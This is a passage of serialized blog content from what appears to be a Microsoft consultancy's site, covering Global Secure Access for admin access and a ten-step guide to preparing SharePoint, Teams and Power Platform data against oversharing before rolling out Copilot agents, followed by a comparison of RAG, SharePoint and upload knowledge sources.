access control, which is automated using Entra Governance features. This extends functions already widely used in the Managed Red Tenant—such as Just-In-Time administration and approval workflows—into the network layer.",[809,7491,7492],{},[838,7493],{"alt":7399,"src":7494},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-05.png",[897,7496,7498],{"id":7497},"revocation-access-in-near-real-time","Revocation Access in Near Real-Time",[809,7500,2484],{},[809,7502,7503],{},"Zero Trust also means being prepared to quickly and effectively contain threats—even within the most secure architecture—and to isolate compromised components.",[809,7505,7506],{},"In a Managed Red Tenant environment, we’re not only prepared for the compromise of users and devices within the tenant itself, but also for the (most likely) scenario where an attack originates from an admin’s office PC and then propagates to the Virtual Admin Workstation.",[809,7508,7509],{},"Thanks to the Universal Continuous Access Evaluation (CAE) feature in Global Secure Access, the following actions are automatically triggered:",[1648,7511,7512,7515],{},[1652,7513,7514],{},"Access to the Virtual Admin Workstation via Entra Private Access is interrupted if, for example, the user risk level of the account in the Workforce Tenant is set to High",[1652,7516,7517],{},"Access to admin interfaces and the datacenter environment is revoked if, for example, the sessions of the account in the Managed Red Tenant are terminated",[809,7519,7520],{},"Additionally, full isolation of all devices and accounts within the Managed Red Tenant can be initiated at any time by the integrated CSOC service.",[809,7522,7523],{},[838,7524],{"alt":7399,"src":7525},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-06.png",[897,7527,7529],{"id":7528},"enriched-sign-ins-and-token-insights","Enriched Sign-Ins and Token Insights",[809,7531,2484],{},[809,7533,7534],{},"Beyond its many features for access control, Global Secure Access is a true game changer when it comes to logging. We gain significantly more telemetry from the network layer and can correlate it with existing sign-in and audit logs.",[809,7536,7537],{},"This enables our CSOC to identify which actions were still performed after containment was triggered—for example, in cases where not all tokens supported Continuous Access Evaluation (CAE).",[809,7539,7540],{},[838,7541],{"alt":7399,"src":7525},[819,7543,7545],{"id":7544},"final-thoughts","Final thoughts",[809,7547,825],{},[809,7549,7550],{},"This blog is published alongside a webcast where we explore the Managed Red Tenant, Global Secure Access, the integration process, and the relevant use cases, supported by live demos.",[809,7552,7553],{},"If this blog has sparked your interest, we definitely encourage you to check out the webcast. And of course, we’re always happy to hear from you directly!",{"title":927,"searchDepth":928,"depth":928,"links":7555},[7556,7559,7567],{"id":7357,"depth":928,"text":7358,"children":7557},[7558],{"id":7372,"depth":935,"text":7373},{"id":7403,"depth":928,"text":7404,"children":7560},[7561,7562,7563,7564,7565,7566],{"id":7412,"depth":935,"text":7413},{"id":7435,"depth":935,"text":7436},{"id":7457,"depth":935,"text":7458},{"id":7477,"depth":935,"text":7478},{"id":7497,"depth":935,"text":7498},{"id":7528,"depth":935,"text":7529},{"id":7544,"depth":928,"text":7545},{"lang":940,"seoTitle":7569,"titleClass":942,"date":7570,"categories":7571,"blogtitlepic":7572,"socialimg":7573,"customExcerpt":7574,"keywords":7575,"maxContent":511,"textImageTeaser":7576,"asideNav":7588,"hreflang":7596,"footer":7601,"scripts":7602,"published":511},"Securing Microsoft 365 Admin Access with Entra and Global Secure Access","2025-09-25",[373],"head-gsa-unlocked.jpg","/blog/heads/head-gsa-unlocked.jpg","This blog explores how Microsoft Global Secure Access enhances security and control in our Managed Red Tenant. With Entra Internet Access and Private Access, organizations can secure admin sessions, enforce Zero Trust, and streamline access to cloud and on-prem resources. Real-world use cases and architecture insights show how to protect M365 environments effectively.","Microsoft Global Secure Access, Entra Internet Access, Entra Private Access, Managed Red Tenant, Zero Trust, M365 security, conditional access, admin access control, secure web filtering, virtual admin workstations, CAE, tenant restrictions, Microsoft 365, cloud security",{"image":7577,"cloudinary":511,"alt":7578,"bgColor":7579,"offset":511,"white":511,"list":7580,"left":752,"float":752,"firstColWidth":3077,"secondColWidth":3089,"copyClasses":7584,"headline":7585,"subline":7586,"spacing":7587},"/icons/shape-managed-red-tenant.svg","Copilot Icon","#E44418",[7581],{"ctaText":7582,"ctaHref":7583,"ctaType":917,"external":511},"Watch the full session on YouTube","https://youtu.be/SpEOIdoA-uc","richtext","Global Secure Access Unlocked: Real World Implementation in Managed Red Tenant","\u003Cp>In the Managed Red Tenant, we enforce strict separation for privileged access. Live demos will show how we secure admin workflows using Global Secure Access.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>How PAWs and VAWs with identity switching create secure admin workstations\u003C/li> \u003Cli>How Tenant Restrictions and Cross-Tenant Access Policies allow only authorized access\u003C/li> \u003Cli>How Per-App Tunnels and Continuous Access Evaluation are replacing traditional VPNs\u003C/li> \u003Cli>How Just-in-Time administration works in practice with Microsoft PIM\u003C/li> \u003C/ul> ","space-top-2 space-bottom-2 mt-10",{"menuItems":7589},[7590,7592,7594],{"href":7591,"text":7358},"#what-is-a-managed-red-tenant",{"href":7593,"text":7404},"#use-cases-for-global-secure-access-in-the-managed-red-tenant",{"href":7595,"text":7545},"#final-thoughts",[7597,7599],{"lang":4,"href":7598},"/de/posts/2025-08-26-agent-ready-infrastructure",{"lang":1028,"href":7600},"/es/posts/2025-08-26-agent-ready-infrastructure",{"noMargin":511},{"slick":511},"/posts/2025-09-25-gsa-unlocked",{"title":7351,"description":927},"posts/2025-09-25-gsa-unlocked",[149,7607,7608,7609,435],"M365 Data Governance","SharePoint Security","AI Data Preparation","5Lq3NEUATZZ8Wmw9LegnI4xy7_QZA8qxFO5vRV6J2iQ",{"id":7612,"title":7613,"author":7614,"body":7615,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":8299,"moment":8301,"navigation":511,"path":8368,"seo":8369,"stem":8370,"tags":8371,"webcast":752,"__hash__":8372},"content_en/posts/2025-08-28-agent-ready-infrastructure copy.md","This is why you need a solid infrastructure to be agent-ready in 2025",[1286],{"type":806,"value":7616,"toc":8261},[7617,7621,7623,7629,7636,7640,7642,7645,7648,7653,7663,7670,7675,7684,7694,7712,7716,7718,7721,7725,7727,7730,7734,7736,7743,7747,7749,7760,7767,7769,7772,7792,7796,7798,7801,7805,7807,7814,7818,7820,7823,7827,7829,7840,7844,7846,7849,7853,7855,7858,7863,7877,7880,7883,7887,7889,7893,7895,7902,7905,7913,7921,7925,7927,7930,7936,7939,7944,7949,7953,7955,7962,7966,7968,7975,7983,7987,7989,7992,7995,7999,8001,8004,8007,8014,8018,8020,8023,8026,8031,8034,8037,8041,8043,8049,8052,8058,8061,8066,8070,8072,8131,8135,8137,8159,8163,8165,8168,8172,8174,8177,8181,8183,8190,8194,8196,8207,8214,8219,8222,8226,8228,8234,8241,8245,8248,8251,8253,8255,8258],[819,7618,7620],{"id":7619},"prologue","Prologue",[809,7622,825],{},[809,7624,7625,7626,3436],{},"With this omnipresence, many ideas and the desire to take action or at least experiment arise. At glueckkanja AG, we support our customers throughout this process. Of course, we are already developing and building agents, but in 80% of our projects, the primary focus is on preparing the data and tenant for agent creation. Before you implement Copilot productively in your organization, it's worthwhile to take a critical look at your infrastructure. When making decisions in this area, there are several important aspects to understand before deploying AI agents on a large scale. That’s why, in this blog post, I will guide you through the essential steps and differences. In a time when AI assistants like Microsoft 365 Copilot Agents promise to transform the working world, one principle holds true above all: ",[848,7627,7628],{},"AI is only as good as the system beneath it",[809,7630,7631,7632,7635],{},"This comprehensive guide outlines ",[1655,7633,7634],{},"how to prepare your data and infrastructure"," for Copilot Agents, covering key practices in SharePoint, Teams, and the Power Platform.",[819,7637,7639],{"id":7638},"why-your-infrastructure-data-matters","Why your infrastructure (data) matters",[809,7641,825],{},[809,7643,7644],{},"As we utilize AI agents, it is imperative to understand that these agents do not inherently possess knowledge about our organization, our data, or our unique operational context. By default, an AI agent only carries the built-in knowledge derived from the training of the Large Language Model (LLM). To effectively enhance and extend the capabilities of these AI agents, it is essential to systematically integrate various components. This enhancement can be achieved through the implementation of System Prompts, Knowledge Bases, Connectors, Web-Search functionalities, access to Microsoft Graph, Semantic Search, and additional tools. These components collectively enable the AI agents to deliver more precise, contextually relevant responses and actions, aligning closely with the specific needs and data of the organization. Since we are now in the very beginning of the agentic area, many of us will start with simple agents that source information based on existing SharePoint Online libraries.",[809,7646,7647],{},"For us in IT, that means we need to take care about our data in SharePoint Online more than ever!",[892,7649,7650],{},[809,7651,7652],{},"SharePoint Online = Knowledge = Data and Data = Key",[809,7654,7655,7658,7659,7662],{},[1655,7656,7657],{},"My clear message:"," Before adding AI copilots to your organization, ",[1655,7660,7661],{},"get your data house in order",". The same data that feeds your Copilot Agents also feeds Microsoft 365 Copilot itself.",[809,7664,7665,7666,7669],{},"And not only that! Microsoft 365 Copilot is assessing the same data. *If that data is cluttered, overshared, or poorly secured, the AI could surface incorrect or sensitive information unexpectedly *or example, imagine asking Copilot about company structure and receiving details of a confidential reorganization plan you weren’t meant to see. Such incidents occur when content is ",[1655,7667,7668],{},"overshared"," (available too broadly) on platforms like SharePoint or Teams. Note: Copilot respects all existing permissions, that means something like only can happen when permissions are misconfigured. Conversely, if data is siloed or inaccessible, AI assistants will be less useful.",[892,7671,7672],{},[809,7673,7674],{},"Copilot only surfaces organizational data that the individual user has at least view permissions for!",[809,7676,7677,1658,7680],{},[1655,7678,7679],{},"Source:",[813,7681,7682],{"href":7682,"rel":7683},"https://learn.microsoft.com/en-gb/copilot/microsoft-365/microsoft-365-copilot-privacy?azure-portal=true",[1509],[809,7685,7686,7689,7690,7693],{},[1655,7687,7688],{},"Key takeaway:"," Enterprise AI succeeds only with a solid data foundation. A recent Microsoft report identifies ",[1655,7691,7692],{},"data oversharing, data leakage, and noncompliant usage"," as top challenges to address before deploying AI. Organizations that invest in preparation of SharePoint Online and other data sources, will unlock Copilot’s benefits with confidence, while those who don’t risk security breaches or irrelevant AI outputs. Studies show about one-third of decision-makers lack full visibility into critical data.",[7695,7696,895,7697,895,7702,895,7705,895,7709],"picture",{},[7698,7699],"source",{"media":7700,"srcSet":7701},"(min-width: 992px)","https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics.png",[7698,7703],{"media":7704,"srcSet":7701},"(min-width: 768px)",[7698,7706],{"media":7707,"srcSet":7708},"(min-width: 576px)","https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics-mob.png",[838,7710],{"src":7708,"alt":7711},"Two statistics on data risks: 30% of decision-makers lack visibility into business-critical data (Visibility Gap) and 87% of security leaders reported a data breach in the past year (Data Breach Prevalence).",[819,7713,7715],{"id":7714},"_10-steps-to-improve-your-m365-data-infrastructure-now","10 steps to improve your M365 data infrastructure now",[809,7717,825],{},[809,7719,7720],{},"Now we know your agents will need data. As we as glueckkanja step in these projects, this is our typical 10-point list that we work from the top to end with our customers.",[897,7722,7724],{"id":7723},"step-1-check-core-sharing-settings","Step 1: Check Core Sharing Settings",[809,7726,2484],{},[809,7728,7729],{},"Verify tenant-wide settings that could lead to oversharing. For example, scrutinize default link sharing policies (e.g. if “Anyone with the link” or “People in your organization” is allowed by default for SharePoint/OneDrive), whether users can create public Teams by default, and if your Power Platform environment is open without governance. Misconfigured defaults here are a common cause of unintentional broad access..",[897,7731,7733],{"id":7732},"step-2-audit-public-teams","Step 2: Audit Public Teams",[809,7735,2484],{},[809,7737,7738,7739,7742],{},"Review any Microsoft Teams marked as “Public.” A public Team means ",[848,7740,7741],{},"anyone in your organization"," can discover and access its content. Ensure that any Team set to public truly contains only non-sensitive, broadly suitable content. If not, switch it to private or adjust membership. (It’s easy for a Team to be created as Public and later forgotten, exposing files to all employees.)",[897,7744,7746],{"id":7745},"step-3-review-graph-connectors","Step 3: Review Graph Connectors",[809,7748,2484],{},[809,7750,7751,7752,7755,7756,7759],{},"Check if your tenant has any ",[848,7753,7754],{},"Microsoft Graph Connectors"," set up that pull in third-party data (e.g. from external file systems, wikis, etc.). Remove or secure any connector that indexes data not everyone should see. ",[1655,7757,7758],{},"Why?"," Content indexed via Graph Connectors becomes part of your Microsoft Graph search index – meaning Copilot can potentially use it to answer prompts. You only want relevant, intended data sources connected.",[897,7761,7763,7764],{"id":7762},"step-4-generate-a-sharepoint-online-baseline-report","Step 4: Generate a ",[1655,7765,7766],{},"SharePoint Online Baseline Report",[809,7768,2484],{},[809,7770,7771],{},"SPO has different possible risks for unwanted data in Agents and Copilot. You need to look for different key metrics:",[1648,7773,7774,7777,7780,7783,7786,7789],{},[1652,7775,7776],{},"Broken Permission Inheritance on a folder-level",[1652,7778,7779],{},"Public SharePoint Sites",[1652,7781,7782],{},"Use of \"Everyone Except External Users\" or other dynamic group that contain all users",[1652,7784,7785],{},"Anyone Sharing Links",[1652,7787,7788],{},"Everyone-in-my-org Sharing Links",[1652,7790,7791],{},"Unwanted people in the Site Admins / Owners / Members / Visitors Group",[897,7793,7795],{"id":7794},"step-5-categorize-and-prioritize-risks","Step 5: Categorize and Prioritize Risks",[809,7797,2484],{},[809,7799,7800],{},"Take the findings from Steps 1–4 and rank them by severity. Which sites or files carry the most business-critical or sensitive data and also have exposure risks? Prioritize fixing those. By layering business context (e.g., a site with financial data vs. a site with generic templates), you can focus on the most impactful issues first.",[897,7802,7804],{"id":7803},"step-6-involve-site-owners-for-access-reviews","Step 6: Involve Site Owners for Access Reviews",[809,7806,2484],{},[809,7808,7809,7810,7813],{},"For each SharePoint site (or Team) highlighted as risky, have the site owner double-check who has access and if that is appropriate. Owners are typically closest to the content and can quickly spot “Oh, why does ",[848,7811,7812],{},"Everyone"," have read access to this? That shouldn’t be.” Implement a process where site admins certify permissions regularly.",[897,7815,7817],{"id":7816},"step-7-establish-ongoing-oversight","Step 7: Establish Ongoing Oversight",[809,7819,2484],{},[809,7821,7822],{},"Put in place a continuous monitoring process for new oversharing issues. Oversharing control isn’t a one-time fix; as new sites, Teams, and files get created, you need to catch misconfigurations proactively. Consider using Microsoft Purview’s reports or alerts to catch things like files shared externally or to huge groups, new public teams created, etc. Microsoft’s tools can automate alerts for these conditions, so make use of them to maintain a strong posture.",[897,7824,7826],{"id":7825},"step-8-apply-sensitivity-labels-and-dlp-policies","Step 8: Apply Sensitivity Labels and DLP Policies",[809,7828,2484],{},[809,7830,7831,7832,7835,7836,7839],{},"Use Microsoft Purview ",[1655,7833,7834],{},"Sensitivity Labels"," to classify data (Confidential, Highly Confidential, etc.) and bind those labels to protection settings. For instance, a “Confidential” label can encrypt files or prevent external sharing. Also configure ",[1655,7837,7838],{},"Data Loss Prevention (DLP)"," policies to prevent or monitor oversharing of sensitive info (like blocking someone from emailing a list of customer SSNs). These tools not only prevent accidental leaks in day-to-day use, they also work with Copilot: if Copilot tries to access or output labeled content in ways it shouldn’t, DLP can intervene. Moreover, Copilot itself will carry forward the document’s label to its responses, as noted later.",[897,7841,7843],{"id":7842},"step-9-implement-power-platform-governance","Step 9: Implement Power Platform Governance",[809,7845,2484],{},[809,7847,7848],{},"Extend your oversight to the Power Platform (Power Apps, Power Automate, etc.). Define DLP policies for Power Platform to control connectors (so someone can’t, say, make a flow that pulls data from a sensitive SharePoint list and posts it to an external service). Also consider having multiple environments (Dev/Test/Prod) with proper security so that “Citizen Developers” building agents or apps don’t inadvertently expose data. Essentially, prevent the Power Platform from becoming an ungoverned backdoor to your data.",[897,7850,7852],{"id":7851},"step-10-educate-and-enable-your-agent-builders","Step 10: Educate and Enable Your Agent Builders",[809,7854,2484],{},[809,7856,7857],{},"Finally, create guidelines and best practices for those who will be building or deploying AI agents (whether they are pro developers or business users). Establish training on handling data safely: e.g., how to choose appropriate knowledge sources for an agent, why not to include sensitive files in a broadly shared agent, how to test an agent’s output for any unexpected info. By fostering a data-aware culture among “agent makers,” you reduce the chance of someone inadvertently exposing information when designing an AI solution.",[809,7859,7860],{},[1655,7861,7862],{},"Sources:",[1648,7864,7865,7871],{},[1652,7866,7867],{},[813,7868,7869],{"href":7869,"rel":7870},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/from-oversharing-to-optimization-deploying-microsoft-365-copilot-with-confidence/4357963",[1509],[1652,7872,7873],{},[813,7874,7875],{"href":7875,"rel":7876},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/microsoft-graph-connectors-update-expand-copilot%E2%80%99s-knowledge-with-50-million-ite/4243648",[1509],[809,7878,7879],{},"After you have completed these steps, you can now securely go on and start building productive agents. To build agents, we have different platforms and features from Microsoft that we can rely on for. You'll find the most prominent examples in the next chapter. If you need help with this list, feel free to reach out to us so we can help you with this important preparation exercise.",[809,7881,7882],{},"Nothing prevents you in the meanwhile to create PoC or Test-Agents with sample data, manually uploaded files or specific data attached via RAG. But we recommend these steps before a larger implementation / rollout of agents.",[819,7884,7886],{"id":7885},"understanding-differences-between-agent-platforms","Understanding differences between Agent Platforms",[809,7888,825],{},[897,7890,7892],{"id":7891},"step-1-understand-your-agent-creators","Step 1: Understand your Agent-Creators",[809,7894,2484],{},[809,7896,7897,7898,7901],{},"After the foundation work to prepare the data, we need to understand which platforms are available to create those agents. We try to differentiate these tools by features and possibilities, but it's important to notice that creating agents and choosing the right tolling is a range. There are multiple ways to build AI agents in the Microsoft ecosystem. It’s important to pick the right one for your needs and your team’s skill level. It also clarifies when to leverage ",[1655,7899,7900],{},"Azure AI Foundry"," versus built-in Copilot Studio tools.",[809,7903,7904],{},"Microsoft offers a set of different tools that can build agents by today. While they seem like each other, they are built for different target audiences and levels of expertise. Take a closer look at the overview below. Understanding who needs to create and maintain these agents, also shows us, which Knowledge sources (= data) we need to prepare for our Agents. Beside the tools in the list below, there are even more pro-code solutions to build agents like M365 Agents Toolkit, Visual Studio Code, Agent SDK and more.  All our data preparation  steps´ apply for them as well, since they access the same data like other agents do.",[809,7906,7907,1658,7909],{},[1655,7908,7679],{},[813,7910,7911],{"href":7911,"rel":7912},"https://www.egroup-us.com/news/microsoft-copilot-ai-integration/",[1509],[7695,7914,895,7915,895,7918],{},[7698,7916],{"media":7700,"srcSet":7917},"https://res.cloudinary.com/c4a8/image/upload/v1756363984/blog/pics/table-copilot-ai-integration.png",[838,7919],{"src":7917,"alt":7920},"Comparison of three Copilot solution categories: Pre-Built (ootb), Makers, and Developers.",[897,7922,7924],{"id":7923},"step-2-identify-use-cases-and-requirements-for-your-platform","Step 2: Identify Use Cases and requirements for your platform",[809,7926,2484],{},[809,7928,7929],{},"As you can probably think of, not every platform supports every use case. Agents can be used for simple tasks, like answering questions based on existing knowledge or complex, like automatically generating answers or executing processes. Also, the final UX where and how we want to access those agents is important to decide for a platform.",[809,7931,7932],{},[838,7933],{"alt":7934,"src":7935},"Diagram showing three levels of agent capabilities from simple to advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/agents-differences.png",[809,7937,7938],{},"With these considerations in mind, we usually try to use the easiest solution possible to build our Agent. But also, we need to find the solution that is scalable for further development. But not every Agent needs to built on Agent AI Foundry from the very beginning.",[809,7940,7941],{},[1655,7942,7943],{},"Tip:",[892,7945,7946],{},[809,7947,7948],{},"If you are not sure where to start to build your Agent, you always can use Copilot Studio and either integrate more Data from Azure AI there and publish it to Microsoft 365 Copilot. So get both \"up- and downwards compatibility\".",[819,7950,7952],{"id":7951},"rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG (Retrieval-Augumented Generation) vs. SharePoint vs. Upload",[809,7954,825],{},[809,7956,7957,7958,7961],{},"Looking at it the first time, everything seems to be RAG – but there are differences! When you first explore Copilot Agents and its agent capabilities, it’s tempting to assume that all knowledge integration follows the same RAG (Retrieval-Augmented Generation) pattern. While they may all ",[848,7959,7960],{},"look"," like RAG from the outside: retrieving documents and generating answers, the way they work under the hood differs significantly. Understanding these differences is essential for choosing the right approach based on your goals, scale, and technical readiness. Here is a short explanation and overview",[897,7963,7965],{"id":7964},"manual-file-uploads","Manual File Uploads",[809,7967,2484],{},[809,7969,7970,7971,7974],{},"Manual upload is the simplest way to add knowledge to a Copilot agent. You drag and drop documents directly into the Copilot Studio interface. Microsoft automatically indexes these files and retrieves relevant content during a user query. This is ideal for small pilots and early testing. ",[1655,7972,7973],{},"Also, be aware that the content of the files should be accessible to everyone with access to agent",". There is not Permission-Management here that you need to take care of. On the other hand, you will need to manually update these files in the long term if things change. Currently for Copilot Agents you can add up to 20 files manually.",[809,7976,7977,7978],{},"Source: ",[813,7979,7982],{"href":7980,"rel":7981},"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge",[1509],"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge#file-size-limits",[897,7984,7986],{"id":7985},"sharepoint-online","SharePoint Online",[809,7988,2484],{},[809,7990,7991],{},"This method uses Microsoft’s Retrieval API to access content directly from SharePoint Online connected via Graph Connector. The agent retrieves the most relevant content live at query time, respecting existing Microsoft 365 permissions. Content can be SharePoint sites, document libraries, folders or files. It’s dynamic, secure, and well-suited for scaling across departments or business units without managing your own infrastructure. Building up on the existing infrastructure, we are using the built-in security model from SharePoint with is a huge benefit compared to other knowledge options. Departments can easily update the files and that will be reflected within the agent. That means if two users with different access levels ask the agent, one might get an answer from a certain file while another user (without access) would not – which is exactly the behavior we want.",[809,7993,7994],{},"Note: SharePoint Lists are currently a not supported knowledge-type, so you can not index them out of the box (Q3 2025)",[897,7996,7998],{"id":7997},"custom-rag-self-managed","Custom RAG (Self-Managed)",[809,8000,2484],{},[809,8002,8003],{},"In a classic RAG setup, you build and manage the entire retrieval pipeline yourself. That includes document preprocessing, chunking, embedding, storing in a vector database, and retrieving the top matches at query time. This gives you full control over how content is processed and retrieved, but it also brings complexity and maintenance overhead. It’s best suited for advanced use cases that require customization beyond what Microsoft’s managed services offer. This is not an in-built feature in Copilot or Copilot Studio; we would do this in Microsoft Azure.",[809,8005,8006],{},"A example when to use RAG could be for instance, If you needed to integrate an AI agent with a proprietary database or thousands of PDFs stored outside of Microsoft 365, and apply custom filters, a self-managed RAG might be necessary – but this requires significant effort.",[809,8008,8009,8010],{},"source: ",[813,8011,8012],{"href":8012,"rel":8013},"https://learn.microsoft.com/en-us/azure/search/retrieval-augmented-generation-overview?tabs=docs",[1509],[897,8015,8017],{"id":8016},"what-to-choose-and-when","What to Choose and When",[809,8019,2484],{},[809,8021,8022],{},"While all three approaches involve retrieving content to support language generation, only the custom self-managed solution qualifies as “true RAG” in the technical sense. For most organizations starting out, manual uploads or SharePoint connections are significantly easier and faster to implement. They provide strong results with minimal setup - and they let teams focus on use case design and adoption, rather than infrastructure.",[809,8024,8025],{},"A general advice from my side in this point:",[892,8027,8028],{},[809,8029,8030],{},"Try to build the agents as close to your data as possible",[809,8032,8033],{},"Example: If your data is stored in large SQL databases or external CRM systems, a SharePoint Agent will not do the job. If we have all our knowledge in SharePoint, SharePoint Agents or Copilot Agents might be a good start.",[809,8035,8036],{},"Custom RAG should be considered only when your needs go beyond what the managed options can provide, not as the default starting point. A manual upload is great for the first pilot or for small pilots with limited and specific knowledge that is not often updated. In many scenarios we would just use a SharePoint library or site with the agent. Because of this, we are focusing on a scenario looking like that:",[819,8038,8040],{"id":8039},"microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","Microsoft 365 Copilot & Copilot Agents: Security & Compliance out of the box",[809,8042,825],{},[809,8044,8045,8048],{},[1655,8046,8047],{},"Secure cloud infrastructure"," is the bedrock for enterprise AI. Microsoft provides the most secure framework possible for our Agents by putting them in context of Microsoft 365 Copilot. Every organization can trust their existing Security Framework based on Conditional Access and Multi-Factor authentication for access and their existing Governance Framework based on Microsoft Purview.",[809,8050,8051],{},"Agents that are used in M365 Copilot or published from Copilot Studio as a Teams Chatbot are only accessible within our tenant boundaries. That means we get the same level of security for these applications that we already have.",[809,8053,8054],{},[838,8055],{"alt":8056,"src":8057},"Diagram showing how Microsoft 365 Copilot accesses user data within Microsoft 365.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/copilot-security.png",[809,8059,8060],{},"In addition to that, Microsoft offers several technical and organization commitments gathered as we call it \"Enterprise Grade Data Protection\".",[809,8062,7977,8063],{},[813,8064,7682],{"href":7682,"rel":8065},[1509],[897,8067,8069],{"id":8068},"microsoft-365-copilot-enterprise-data-protection-edp-for-prompts-and-responses","Microsoft 365 Copilot: Enterprise Data Protection (EDP) for Prompts and Responses",[809,8071,2484],{},[1648,8073,8074,8093,8099,8119,8125],{},[1652,8075,8076,8079,8080,2261,8083,8086,8087,2261,8090,3436],{},[1655,8077,8078],{},"Contractual Protection",": Prompts (user input) and responses (Copilot output) are protected under the ",[1655,8081,8082],{},"Data Protection Addendum (DPA)",[1655,8084,8085],{},"Product Terms",". These protections are the same as those applied to ",[1655,8088,8089],{},"emails in Exchange",[1655,8091,8092],{},"files in SharePoint",[1652,8094,8095,8098],{},[1655,8096,8097],{},"Data Security:"," Encryption at rest and in transit, Physical security controls, Tenant-level data isolation",[1652,8100,8101,8104,8105,8108,8109,883,8112,883,8115,8118],{},[1655,8102,8103],{},"Privacy Commitments"," Microsoft acts as a ",[1655,8106,8107],{},"data processor",", using data only as instructed by the customer. Supports ",[1655,8110,8111],{},"GDPR",[1655,8113,8114],{},"EU Data Boundary",[1655,8116,8117],{},"ISO/IEC 27018",", and more.",[1652,8120,8121,8124],{},[1655,8122,8123],{},"Access Control & Policy Inheritance",": Copilot respects: Identity models and permissions, Sensitivity labels, Retention policies, Audit settings, Admin configurations, AI & Copyright Risk Mitigation and Protection against: Prompt injection, Harmful content, Copyright issues (via protected material detection and Customer Copyright Commitment)",[1652,8126,8127,8130],{},[1655,8128,8129],{},"No Model Training:"," Prompts, responses, and Microsoft Graph data are NOT used to train foundation models.",[897,8132,8134],{"id":8133},"copilot-agents-with-sharepoint-online-knowledge","Copilot Agent's with SharePoint Online-Knowledge:",[809,8136,2484],{},[1648,8138,8139,8149],{},[1652,8140,8141,8144,8145,8148],{},[1655,8142,8143],{},"Permission & Sharing Model:"," Agents with SharePoint Online access always respects the permissions of the associated SharePoint site. That means, ",[1655,8146,8147],{},"on one hand, you need to ensure that everyone who should have access has at least read permissions on the site","; on the other hand, you must be vigilant about not granting unnecessary permissions that could expose sensitive information to unauthorized users**. Properly configuring permissions is essentia**l, as Copilot Agents will only be able to access and surface content that the querying user is permitted to see. Additionally, leveraging Microsoft Purview information protection ensures that sensitivity labels and data loss prevention (DLP) policies persist with the content",[1652,8150,8151,8154,8155,8158],{},[1655,8152,8153],{},"Persistent Labels & DLP:"," Enable ",[1655,8156,8157],{},"Microsoft Purview"," information protection so that sensitivity labels persist with content. Copilot agents inherit labels on source documents. Meaning if a file is classified “Confidential,” any AI-generated content or document from now on, will carry that label forward. This persistent label inheritance works in tandem with Data Loss Prevention policies to prevent AI from inadvertently exposing protected data. In practice, that means even if Copilot summarizes a sensitive file, the summary will be handled as sensitive too. This is something outstanding we do not find outside of Microsoft 365 and we won't see any AI Agent that is able to deeply integrate like this in the Microsoft 365 ecosystem!",[819,8160,8162],{"id":8161},"best-practices-to-prepare-further-sharepoint-online-for-agent-use","Best Practices to prepare further SharePoint Online for Agent use",[809,8164,825],{},[809,8166,8167],{},"To prepare SharePoint Online for effective use with Copilot Agents, follow these best practices:",[897,8169,8171],{"id":8170},"dedicated-sharepoint-site","Dedicated SharePoint Site",[809,8173,2484],{},[809,8175,8176],{},"First, create a dedicated SharePoint site or a specific folder designed exclusively for your Copilot Agent’s knowledge base. This approach helps minimize issues related to oversharing and reduces the risk of users accidentally uploading sensitive or irrelevant files to the agent’s accessible repository. If you decide to use an existing SharePoint site, carefully review its contents to ensure that no confidential or sensitive information is stored there that should not be discoverable by the agent.",[897,8178,8180],{"id":8179},"granting-access","Granting Access",[809,8182,2484],{},[809,8184,8185,8186,8189],{},"It is also important to ensure that all intended users have the necessary read permissions to access the site or folder. If you need to grant access manually, Ensure all intended users have read access to the site (for example, by ",[1655,8187,8188],{},"adding them to the SharePoint site’s Visitors group"," or an appropriate Azure AD security group) to simplify the process and prevent accidental permission misconfigurations.",[897,8191,8193],{"id":8192},"prepare-files","Prepare Files",[809,8195,2484],{},[809,8197,8198,8199,8202,8203,8206],{},"When preparing documents for use with Copilot Agents, remember that the AI currently ",[1655,8200,8201],{},"cannot interpret embedded images within"," files. ",[1655,8204,8205],{},"Therefore, add descriptive image captions or alternative text"," to help ensure that important visual information is not lost. For text-heavy documents, make sure When summarizing or referencing content, keep the total to a maximum of 1.5 million words or 300 pages to ensure Copilot works effectively.",[809,8208,8209,8210,8213],{},"For ",[1655,8211,8212],{},"Excel files",", organize your data so that each file focuses either on numbers or on text, as mixed-content tables tend to yield less accurate results. Agents also respond most reliably to queries when the relevant data is contained within a single sheet of the workbook.",[809,8215,8216],{},[848,8217,8218],{},"Agents respond best to Excel data when it’s contained in one sheet.",[809,8220,8221],{},"Example: If you have a large customer feedback survey stored in a single Excel file, separate the quantitative data (such as ratings and numerical responses) from the qualitative data (such as free-text feedback) into two different sheets. This method allows you to use tools like Python and Excel formulas to efficiently analyze the numerical data (e.g., calculate averages, sort results, determine confidence levels), while leveraging M365 Copilot’s sentiment analysis features to gain insights from the text-based feedback.",[897,8223,8225],{"id":8224},"file-limitations","File Limitations",[809,8227,2484],{},[809,8229,8230,8231],{},"Finally, be aware of the file types and size limitations supported by Copilot Agents and Copilot Studio. The following table outlines current support:",[813,8232,7982],{"href":7980,"rel":8233},[1509],[809,8235,8236,8237],{},"Also acknowledge those best practices Microsoft has shared on document lengths: ",[813,8238,8239],{"href":8239,"rel":8240},"https://support.microsoft.com/en-gb/topic/keep-it-short-and-sweet-a-guide-on-the-length-of-documents-that-you-provide-to-copilot-66de2ffd-deb2-4f0c-8984-098316104389",[1509],[8242,8243],"v-table",{":head":2391,":hide-container":2391,":table":8244},"fileLimitations",[809,8246,8247],{},"Currently unsupported Filetypes in SharePoint Online: Officially everything else that is not listed there, is not officially supported.",[809,8249,8250],{},"Certain file types, such as CSV files, may function adequately even though they are not officially supported because they closely resemble plain text formats. However, most other file types—particularly container files like CAB, 